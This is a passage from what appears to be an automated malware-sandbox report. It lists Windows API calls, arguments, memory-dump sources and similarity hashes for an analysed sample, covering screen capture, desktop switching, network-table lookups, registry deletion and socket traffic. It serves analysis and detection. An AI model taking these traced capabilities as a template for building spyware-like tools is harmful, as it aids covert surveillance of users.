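Run it as-is to print the decoded arguments for the embedded lines, or feed it the copied "APIs" lines of any other function entry. Only the constants that occur in this report are tabled; extend the tables from the SDK headers as needed, and treat a `"(Name)"` label printed by the sandbox as a hint rather than ground truth, since the raw value is what the code actually passed.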

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04EB5011
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 04EB502E
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 04EB5037
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000007,?,?,?), ref: 04EB504D
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,?), ref: 04EB5095
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                                                    • String ID:
                                                                                    • API String ID: 1503672127-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 04EC2913
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 04EC2920
                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC2933
                                                                                    • ReleaseDC.USER32 ref: 04EC293C
                                                                                    • DeleteObject.GDI32(00000000), ref: 04EC2943
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3052192651-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 04EC2A2D
                                                                                    • SelectObject.GDI32(?,00000000), ref: 04EC2A3C
                                                                                    • BitBlt.GDI32(?,?,?,8A0004C2,5DE58B5B,?,?,?,?), ref: 04EC2A62
                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,5DE58B5B,?,00000000,?,00CC0020), ref: 04EC2A84
                                                                                    • DeleteObject.GDI32(00000000), ref: 04EC2AB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteSectionSelect
                                                                                    • String ID:
                                                                                    • API String ID: 3188413882-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04ECCF22
                                                                                    • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 04ECCF4A
                                                                                    • htons.WS2_32(?), ref: 04ECCF66
                                                                                    • StrPBrkW.SHLWAPI(?,04EFE788,?,00000010,00000000,?,?), ref: 04ECCF8C
                                                                                    • StrChrW.SHLWAPI(?,00000025,?,00000010,00000000,?,?), ref: 04ECCF97
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: htons$AddressString
                                                                                    • String ID:
                                                                                    • API String ID: 2368566317-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04EB9782,?,Function_000568D8,00000000), ref: 04EC7A78
                                                                                      • Part of subcall function 04EB2330: CoInitialize.OLE32(00000000), ref: 04EB239B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04EB9782,?,Function_000568D8,00000000), ref: 04EC7AD0
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC7B21
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC7B46
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7B4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3162378676-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 04ECD115
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000004,00000000,00000004), ref: 04ECD127
                                                                                    • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 04ECD155
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000004,00000001,00000004), ref: 04ECD167
                                                                                    • SetLastError.KERNEL32(00000057), ref: 04ECD17E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: setsockopt$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1564866530-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC1204
                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020106,?), ref: 04EC1232
                                                                                    • SHDeleteKeyW.SHLWAPI(?,04EFB5D0), ref: 04EC1244
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC1252
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04EC1270
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseDeleteFreeOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3791902735-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • send.WS2_32(?,?,?,00000000), ref: 04ECF3DA
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,04ECF2F6,?,00000000), ref: 04ECF3EE
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04ECF2F6,?,00000000), ref: 04ECF3FE
                                                                                    • SetLastError.KERNEL32(00000000,?,?,04ECF2F6,?,00000000), ref: 04ECF406
                                                                                    • WSAGetLastError.WS2_32(?,?,04ECF2F6,?,00000000), ref: 04ECF44B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeavesend
                                                                                    • String ID:
                                                                                    • API String ID: 421069059-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,04EC963F,?,?), ref: 04EC0C33
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?,?), ref: 04EC0C5F
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,00000000), ref: 04EC0C92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC0CB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1586453840-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                    • String ID:
                                                                                    • API String ID: 2015114452-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EBD550: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                      • Part of subcall function 04EBD550: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                      • Part of subcall function 04EBD960: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                      • Part of subcall function 04EBD960: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                    • LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                    • LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC05
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$AddressLibraryLoadProc$AllocSize
                                                                                    • String ID:
                                                                                    • API String ID: 3284714279-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 04EEA334
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EEA357
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04EEA37D
                                                                                    • _free.LIBCMT ref: 04EEA390
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04EEA39F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 2278895681-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED3FE8
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED400A
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED402D
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED4057
                                                                                    • SetLastError.KERNEL32(00000057,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED405E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$CompletionEnterLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 4119631813-0
                                                                                    • Opcode ID: 9633b42a93b288c5438a2a5b6fa86a57237589ffe5a8397000a3a6fc4287fb12
                                                                                    • Instruction ID: 8438cb7a37509567671faf5fd955e8cbe09b79dd736c959cd3166bbadbc0d69e
                                                                                    • Opcode Fuzzy Hash: 9633b42a93b288c5438a2a5b6fa86a57237589ffe5a8397000a3a6fc4287fb12
                                                                                    • Instruction Fuzzy Hash: 62112732200204EBCB208F55DC48FAAB779FF94716F109059FD0587186C736E942CBA1
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECF495
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EB8125,74E5F5E0,00000000,80004005,80004005,80004005,80004005,80004005,?,04EB8B17,04EFD048,?), ref: 04ECF552
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                      • Part of subcall function 04ECE500: SetEvent.KERNEL32(?,?,04EB8B5E,04EFD024,?), ref: 04ECE527
                                                                                      • Part of subcall function 04ECE500: CloseHandle.KERNEL32(00000000,?,04EB8B5E,04EFD024,?), ref: 04ECE54A
                                                                                    • WSACloseEvent.WS2_32(00000000), ref: 04ECF4FB
                                                                                    • shutdown.WS2_32(?,00000001), ref: 04ECF513
                                                                                    • closesocket.WS2_32(?), ref: 04ECF51C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 880953794-0
                                                                                    • Opcode ID: 579eb13004539c08b5e4ed91f633cef30d9a8d00ea356c782f81c644f154ce55
                                                                                    • Instruction ID: a9ba70f199c4de5b39e02c5c48577c56a22a4c5eb4f234bf850a594c58ae5d7a
                                                                                    • Opcode Fuzzy Hash: 579eb13004539c08b5e4ed91f633cef30d9a8d00ea356c782f81c644f154ce55
                                                                                    • Instruction Fuzzy Hash: 97211C70700602ABD7149F29D44CBA9BBA6FF8431AF144219E519876D0CB75F8A6CF90
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,3D21FB31,-00000004,04EE138C,04EE817F,3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8665
                                                                                    • _free.LIBCMT ref: 04EE869A
                                                                                    • _free.LIBCMT ref: 04EE86C1
                                                                                    • SetLastError.KERNEL32(00000000,00000001), ref: 04EE86CE
                                                                                    • SetLastError.KERNEL32(00000000,00000001), ref: 04EE86D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 3a21a4f0408bc8b1eb5cbc3a490902b89e55125cba5cdfcd2b1558107c99cdf3
                                                                                    • Instruction ID: 40439ca08924ed94c8cfd54d923a42627628996b82d5b8db9257281c4709bab9
                                                                                    • Opcode Fuzzy Hash: 3a21a4f0408bc8b1eb5cbc3a490902b89e55125cba5cdfcd2b1558107c99cdf3
                                                                                    • Instruction Fuzzy Hash: 34018136241602EBE3127B776C4897B266DFBC12AD7216D26FC15A3280FF66EC014165
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC5637
                                                                                    • GetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC563E
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 04EC565C
                                                                                    • SetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC5679
                                                                                    • CloseDesktop.USER32(00000000,?,00000000), ref: 04EC5684
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                                                    • String ID:
                                                                                    • API String ID: 2068333509-0
                                                                                    • Opcode ID: 6be30a3e29bef1a6e5540f26ddf1a4c2260d9f4a2cc96c3de22cf91e71f90082
                                                                                    • Instruction ID: 7d7ebc50c54e59a609d6ef0a659185b3164fd9267f22b41c444e1d75531d774d
                                                                                    • Opcode Fuzzy Hash: 6be30a3e29bef1a6e5540f26ddf1a4c2260d9f4a2cc96c3de22cf91e71f90082
                                                                                    • Instruction Fuzzy Hash: 9B01D635600118BBD720AF75AC05AFE77ACEF84352F0000AEFC05C7240DE78AE818794
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(0000020E), ref: 04EBB4E9
                                                                                    • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000002,00000080,00000000), ref: 04EBB51B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EBB522
                                                                                    • SetEvent.KERNEL32(?), ref: 04EBB52F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateDeleteEventHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1798639166-0
                                                                                    • Opcode ID: 13ff20f9ee8c445bd5a31e069bf682696fd6779346550f34482df0e55c1eb1ca
                                                                                    • Instruction ID: 3a0929708bb190fa199d0fa32475387e168d0ee9bd68dee71155df3623fcc4a8
                                                                                    • Opcode Fuzzy Hash: 13ff20f9ee8c445bd5a31e069bf682696fd6779346550f34482df0e55c1eb1ca
                                                                                    • Instruction Fuzzy Hash: 2301F172802344AEEB109B64F80CFA63B69EB40319F54C154F1968A8C3CB2AF891CB51
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EBD960: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                      • Part of subcall function 04EBD960: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalSize.KERNEL32 ref: 04EBDCB8
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EBDCC6
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDCE9
                                                                                    • LocalSize.KERNEL32 ref: 04EBDCEC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDD03
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                    • String ID:
                                                                                    • API String ID: 3285080383-0
                                                                                    • Opcode ID: 1e1e7d21a46160e7e96f1417a71786ed92460bf59a79fdbfe19ade66ee85556f
                                                                                    • Instruction ID: 252fc688c47c38f208033c78530902fbed303ec6f6f4b0fefec1835f366e9370
                                                                                    • Opcode Fuzzy Hash: 1e1e7d21a46160e7e96f1417a71786ed92460bf59a79fdbfe19ade66ee85556f
                                                                                    • Instruction Fuzzy Hash: 3BF0D1B5901218BBD714ABB59C84CABBFACEF49255B0002A9FD49A7245DE35AD00CBE0
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EBD550: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                      • Part of subcall function 04EBD550: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC48
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EBDC56
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDC79
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC7C
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDC93
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                    • String ID:
                                                                                    • API String ID: 3285080383-0
                                                                                    • Opcode ID: 9c3df24ddaeecb2718bc5d385563465697ff3e457b8afe27bb4aa1a5ffad4fa4
                                                                                    • Instruction ID: 5111b3ef3c247dd88b6d25aa92c9187943d71862de49c662beb6c02e7f23a79a
                                                                                    • Opcode Fuzzy Hash: 9c3df24ddaeecb2718bc5d385563465697ff3e457b8afe27bb4aa1a5ffad4fa4
                                                                                    • Instruction Fuzzy Hash: 6DF0F9B5901218BBD714ABB59C44CBBBF6CEF49255B000199FD09A3245DE35AD00CBF0
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,7761EB70,?,?,?,04ED25DF,?,?,?,?), ref: 04ED27E7
                                                                                    • EnterCriticalSection.KERNEL32(?,7761EB70,?,?,?,04ED25DF,?,?,?,?), ref: 04ED27FC
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,04ED25DF,?,?,?,?), ref: 04ED2814
                                                                                    • shutdown.WS2_32 ref: 04ED282D
                                                                                    • closesocket.WS2_32(?), ref: 04ED2834
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter$Leaveclosesocketshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3384241815-0
                                                                                    • Opcode ID: 40a5c25eb107fd8956f0c2704987a5ddc05f7d70df0afc7a7499fb6367605583
                                                                                    • Instruction ID: e6b0676c3694cc3555feef5a6fdf5a057a1b453b3749a2cb719291a168bd049f
                                                                                    • Opcode Fuzzy Hash: 40a5c25eb107fd8956f0c2704987a5ddc05f7d70df0afc7a7499fb6367605583
                                                                                    • Instruction Fuzzy Hash: A1016933201615BBCB119F959C48AEAB768FF89322F104155FB2593180CB74B956DBA1
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EEBDB9
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEBDCB
                                                                                    • _free.LIBCMT ref: 04EEBDDD
                                                                                    • _free.LIBCMT ref: 04EEBDEF
                                                                                    • _free.LIBCMT ref: 04EEBE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 621bd30156779c2ac728451efbd564204d9f82550cda581810f23b07fb6baa3a
                                                                                    • Instruction ID: 30bd6b21d03b4ce38a95d8328f3bc1b88f69d228b9198169b9d7a0e832181532
                                                                                    • Opcode Fuzzy Hash: 621bd30156779c2ac728451efbd564204d9f82550cda581810f23b07fb6baa3a
                                                                                    • Instruction Fuzzy Hash: CDF01D72614608AF9620EB5AF585D3A77D9FB447187642D06F448E7600CB35FC808A61
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7B83
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC7B91
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BA3
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BAD
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1896077197-0
                                                                                    • Opcode ID: 55897d1751347a77882db7457e84b3384cafc151e80a573d82fa0873257a0715
                                                                                    • Instruction ID: e59cd98f6ff0b348bba8b7c06ebac542101701b9df2f13dee94a8eb39e4c3966
                                                                                    • Opcode Fuzzy Hash: 55897d1751347a77882db7457e84b3384cafc151e80a573d82fa0873257a0715
                                                                                    • Instruction Fuzzy Hash: 13F0A471100305ABD321AF69DC09EC7BBE9DF55711F10891EEA9692190DA71F440CB61
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA54
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA61
                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA6C
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA8F
                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAAA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$DeleteLeave$Enter
                                                                                    • String ID:
                                                                                    • API String ID: 2043033798-0
                                                                                    • Opcode ID: 849dc29ab4b8fb46051a7722ef8e64b9bf4a93cf7dce84f62b1988ffa3b797b6
                                                                                    • Instruction ID: d214e23636c0c6defba9109e3f90b5a34d8e4e28db91afb679f85f45210d5fb8
                                                                                    • Opcode Fuzzy Hash: 849dc29ab4b8fb46051a7722ef8e64b9bf4a93cf7dce84f62b1988ffa3b797b6
                                                                                    • Instruction Fuzzy Hash: 5BF0E772102912EBDB15DB65E908BEAB7A8FF88316F001119E95682D48CB38F655CBD4
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7C00
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C0E
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C20
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C2A
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1896077197-0
                                                                                    • Opcode ID: 47475061be921e7884ee4ad30b945f40a6f69872a63215804fd727b3cb4d0613
                                                                                    • Instruction ID: 9c061ef0c53b07aac1251321f37ac1503f79d319b4d36ef1931467199307b35a
                                                                                    • Opcode Fuzzy Hash: 47475061be921e7884ee4ad30b945f40a6f69872a63215804fd727b3cb4d0613
                                                                                    • Instruction Fuzzy Hash: 04F012751007019BD731AF26EC09E87FBF9EF88311B114A1EEA9692164DA70F841DF51
                                                                                    Uniqueness
                                                                                    • Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: $
                                                                                    • API String ID: 48624451-227171996
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB35EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    Uniqueness

